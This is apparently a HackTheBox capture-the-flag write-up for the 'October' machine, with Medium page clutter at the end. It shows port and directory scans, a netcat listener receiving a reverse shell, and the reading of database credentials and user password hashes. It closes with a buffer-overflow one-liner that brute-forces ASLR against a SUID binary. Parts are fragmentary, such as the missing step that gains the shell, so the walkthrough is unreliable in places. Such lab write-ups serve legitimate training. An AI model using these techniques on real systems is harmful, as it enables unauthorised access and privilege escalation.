October — Write-up — HackTheBox

Reconnaissance

echo '10.10.10.16    october.htb' >> /etc/hosts
export IP=october.htb

nmap -vv -sV -sT -p- -O -A -oN nmap_scan.txt $IP

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBANmRR7UDp17vLPWjPYGFFxhFHygkw1gVmWZCAUO+TBY4OPnIWGRwrG+zyo39zVror9IS7wgI8rGUuwSd0Yc0xOYl>
| 2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Txq4c0jb5/pJpdDRWMw6kGit+0TeEKq3yWPLLPifxMillxkW1P4j51ANiLUE9wQjzBticFF4Ql6l>
| 256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWJqXjmPMM11lDdFy512ITtTx1mh4bP6jxTLmGYtSBY>
| 256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA/9PENIoYUITEQDOKLYfiaUxVAgpixE8w//rH53DU7u
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 1D585CCF71E2EB73F03BCF484CFC2259
| http-methods:
| Supported Methods: GET HEAD POST PUT PATCH DELETE OPTIONS
|_ Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: October CMS - Vanilla
root@kali:/home/czar/Downloads/HTB/october# dirb http://october.htb-----------------
DIRB v2.22
By The Dark Raver
-----------------OUTPUT_FILE: ./dirb_out.txt
URL_BASE: http://october.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Fine tunning of NOT_FOUND detection
OPTION: Printing LOCATION header
OPTION: Interactive Recursion-----------------
GENERATED WORDS: 4612---- Scanning URL: http://october.htb/ ----
+ http://october.htb/account (CODE:200|SIZE:264)
+ http://october.htb/backend (CODE:302|SIZE:400)
(Location: 'http://october.htb/backend/backend/auth')
+ http://october.htb/blog (CODE:200|SIZE:229)
+ http://october.htb/Blog (CODE:200|SIZE:229)
==> DIRECTORY: http://october.htb/config/
+ http://october.htb/error (CODE:200|SIZE:177)
+ http://october.htb/forgot-password (CODE:200|SIZE:206)
+ http://october.htb/forum (CODE:200|SIZE:383)
root@kali:/home/czar/Downloads/HTB/october# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.16] 52160
Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686 athlon i686 GNU/Linux
19:50:45 up 23 min, 0 users, load average: 10.06, 11.38, 13.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1307): Inappropriate ioctl for device
bash: no job control in this shell
www-data@october:/$ python -c "import pty;pty.spawn('/bin/bash')"

MySQL

cat /var/www/html/cms/config/database.php:---SNIP --
'mysql' => [
'driver' => 'mysql',
'host' => 'localhost',
'port' => '',
'database' => 'october',
'username' => 'october',
'password' => 'OctoberCMSPassword!!',
'charset' => 'utf8',
'collation' => 'utf8_unicode_ci',
'prefix' => '',
use october;
show tables;
select * from users; --show registered user via the web app.
select * from backend_users; -- we get both harry and admin hashed credendtials.

Buffer Overflow and ASLR Brute Force

while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + “\x10\x23\x5d\xb7” + “\x06\x52\x5c\xb7” + “\xac\x4b\x6f\xb7”’);done

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Herding Pixels

Q2 FY 18 Product Releases, for a better Internet "end-to-end"

CXL Institute Digital Analytics Minidegree Review Part 10

Introduction to Algorithms: Chapter Two, Merge Sort

Proxy Microservice Design Pattern

My Pokémon patches app

BPaaS ❤️ RPA. A power couple!

An Insight into Captcha

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xczar

0xczar

More from Medium

All the things you need to know, to start a lazy keto diet

Augmented Exercise 1 — Aidan Massie

Portfolio Project: The lost king

CS373 Spring 2022: Swapnil Shaurya: Final Entry